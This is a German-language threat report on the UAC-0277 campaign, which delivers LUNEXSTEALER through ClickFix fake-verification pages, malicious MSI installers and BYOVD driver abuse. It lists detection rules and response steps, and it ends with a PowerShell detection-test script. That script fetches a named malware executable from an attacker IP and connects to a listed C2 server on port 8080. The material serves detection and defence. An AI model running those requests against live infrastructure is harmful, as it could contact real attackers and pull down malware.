UAC-0277-Angriffe liefern LUNEXSTEALER über bösartige MSI und ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure, die als UAC-0277 verfolgt werden, kompromittieren legitime Websites, um bösartigen JavaScript einzuschleusen, der Benutzer dazu verleitet, Befehle über eine gefälschte Cloudflare-Verifizierungsseite auszuführen. Diese ClickFix-Technik liefert letztendlich MSI-Pakete, die LUNEXSTEALER oder zusätzliche Loader enthalten, die BYOVD nutzen, um Sicherheitskontrollen zu umgehen. Die Kampagne verwendet auch blockchain-basierte Command-and-Control-Infrastruktur auf Polygon und Ethereum, um Angreiferressourcen dynamisch zu verwalten.
Untersuchung
CERT-UA identifizierte mehr als 100 kompromittierte Websites und analysierte drei mit der Kampagne verbundene MSI-Varianten. Forscher beobachteten DLL-Sideloading unter Verwendung von FnHotkeyUtility.exe und die Ausnutzung des anfälligen AMD-PDFWKRNL.sys-Treibers, um Windows Defender-Schutz zu umgehen. Die Untersuchung enthüllte auch die LUNARAXE-Browsererweiterung und die NAIVEMESS-PowerShell-Komponente, die zur Sammlung und Exfiltration von Daten verwendet wurden.
Eindämmung
Administratoren sollten den Zugriff auf das Ausführen-Dialogfeld (Win+R) über Gruppenrichtlinien einschränken und die MSI-Installationsberechtigungen auf autorisierte Benutzer beschränken. Die Aktivierung der Microsoft-Schwachstellen-Treibersperrliste ist entscheidend, um das Risiko von BYOVD-Angriffen zu verringern. Organisationen sollten auch durchsetzten, dass nur zugelassene Browsererweiterungen verwendet werden, und verdächtige msiexec.exe-Befehlszeilenaktivitäten mit Remote-URLs überwachen.
Antwort
Wenn verdächtige MSI-Ausführungen oder unbefugte Browsererweiterungen entdeckt werden, isolieren Sie den betroffenen Host und beenden Sie alle Prozesse, die mit LUNEXSTEALER in Verbindung stehen. Überprüfen Sie geplante Aufgaben auf Einträge namens psychedelicloveUtils und inspizieren Sie Browserprofile auf die Microsoft Office Word Editor-Erweiterung. Alle identifizierten gefälschten Cloudflare-Verifizierungsseiten, die mit der Kampagne in Verbindung stehen, sollten an CERT-UA gemeldet werden.
Angriffsfluss
Erkennungen
Verdächtiger RunMRU-Eintrag mit LOLBin-Semantik (über registry_event)
Möglicher Versuch der Installation einer Remote-MSI-Datei (über cmdline)
Verdächtige geplante Aufgabe (über Audit)
Verdächtiger Dateidownload direkt über IP (über Proxy)
Verdächtige Befehls- und Kontrollanfrage durch ungewöhnlichen Top-Level-Domain (TLD) DNS-Request (über dns)
IOCs (HashSha256), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware Teil 2
IOCs (HashSha256), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware Teil 1
IOCs (HashMd5), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware Teil 2
IOCs (HashMd5), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware Teil 1
IOCs (SourceIP), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware
IOCs (DestinationIP), um zu erkennen: UAC-0277-Kampagne: Bösartige MSI-Bereitstellung über ClickFix-Technik und LUNEXSTEALER-Malware
Interaktion mit bösartigen C2-Servern über HTTP und WebSocket erkennen [Windows-Netzwerkverbindung]
FnHotkeyUtility führt bösartige spkvol.dll über DLL-Sideloading aus [Windows Sysmon]
Bösartiger MSI-Paket-Download unter Verwendung von Msiexec und Verwundbarkeitsexploit [Windows-Prozesserstellung]
Bösartiges JavaScript auf kompromittierten Websites erkennen [Webserver]
Simulationsausführung
-
Angriffsablauf & Befehle: Der Angreifer hat erfolgreich eine Drive-by-Kompromittierung durchgeführt. Um Persistenz zu erreichen und die nächste Stufe der Malware herunterzuladen, versucht der eingeführte Agent, eine Datei namens
psychedeliclove.exevon einem bestimmten URI abzurufen. Gleichzeitig versucht der Agent, an einen sekundären C2-Knoten zu senden, der sich bei193.178.159.128auf dem Port8080befindet, um Anweisungen über eine WebSocket-ähnliche HTTP-Verbindung zu erhalten. Diese spezifischen Indikatoren sollen die bestehenden Proxy-basierten Erkennungsregeln auslösen. -
Regressionstestskript:
# Simulationsskript zur Erkennungsvalidierung # Zweck: Die spezifischen URL- und IP/Port-Indikatoren in der Erkennungsregel auslösen. Write-Host "[*] Starte Simulation..." -ForegroundColor Cyan # 1. Trigger Auswahl 1: Bösartiges URL-Muster Write-Host "[*] Versuch, auf bösartiges URL-Muster zuzugreifen..." -ForegroundColor Yellow try { # Wir verwenden einen nicht existierenden lokalen Listener oder eine gefälschte URL, um sicherzustellen, dass wir tatsächlich keine echte bösartige Seite treffen, # aber der Proxy sollte dennoch den Anfragenversuch protokollieren. Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue } catch { Write-Host "[!] Anfrage fehlerhaft (erwartet), aber Telemetrie sollte generiert werden." -ForegroundColor Gray } # 2. Trigger Auswahl 2: Spezifische IP und Port Write-Host "[*] Versuch, Verbindung zur C2-IP auf Port 8080 herzustellen..." -ForegroundColor Yellow try { $client = New-Object System.Net.Sockets.TcpClient $client.Connect("193.178.159.128", 8080) $client.Close() } catch { Write-Host "[!] Verbindung fehlerhaft (erwartet), aber Protokollprotokolle sollten den Versuch erfassen." -ForegroundColor Gray } Write-Host "[*] Simulation abgeschlossen." -ForegroundColor Cyan -
Bereinigungskommandos:
# Durch diese Simulation werden keine permanenten Dateien erstellt. # Es werden nur temporäre Netzwerkverbindungen versucht. Write-Host "[*] Bereinigung abgeschlossen. Keine Artefakte auf dem System hinterlassen." -ForegroundColor Green